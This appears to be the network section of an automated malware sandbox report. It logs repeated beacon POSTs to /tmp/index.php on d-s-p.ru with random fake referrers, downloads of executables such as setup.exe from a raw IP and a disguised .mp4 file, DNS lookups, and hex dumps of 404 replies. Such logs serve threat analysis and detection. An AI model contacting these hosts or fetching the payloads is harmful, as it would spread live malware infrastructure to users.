        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ypotdnyqkrcswq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oywmgpnhuhb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://laowevegchj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqncwrghqkte.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agvphbybllsas.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjrsolarxwh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njmhqmwqrarclhje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://visknbdtdhq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iasmrrglydiueqr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhjqltphdtwpxuw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aqewaciknwcref.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://newmvklahrrrgqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plkttxwuhrfxb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhajwwseppqky.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dltxnhcbkmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhxuaiudkfar.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: GET /setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.162
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hssuixmkgbellf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnwqqljmdwq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvyahhxtkfb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pagpbwhildwqiuis.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: d-s-p.ru
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.162
        Source: global trafficHTTP traffic detected: GET /wp-content/images/pic4.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.tazc.com.my
        Source: global trafficHTTP traffic detected: GET /Vmujqcxm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: upadaria.org
        Source: global trafficHTTP traffic detected: GET /plugins/panel/uploads/Mwczjtflz.mp4 HTTP/1.1Host: lotuseffectllc.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Birge.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: firemane.org
        Source: global trafficHTTP traffic detected: GET /plugins/panel/uploads/Mwczjtflz.mp4 HTTP/1.1Host: lotuseffectllc.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.162
        Source: global trafficDNS traffic detected: DNS query: d-s-p.ru
        Source: global trafficDNS traffic detected: DNS query: midginvineco.com
        Source: global trafficDNS traffic detected: DNS query: www.tazc.com.my
        Source: global trafficDNS traffic detected: DNS query: upadaria.org
        Source: global trafficDNS traffic detected: DNS query: lotuseffectllc.com
        Source: global trafficDNS traffic detected: DNS query: webdot.ddns.net
        Source: global trafficDNS traffic detected: DNS query: firemane.org
        Source: global trafficDNS traffic detected: DNS query: kdtIFBJmLPfUAdsjOyiinDxA.kdtIFBJmLPfUAdsjOyiinDxA
        Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjwipwxdaicmvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: d-s-p.ru
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 82 ee Data Ascii: r
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
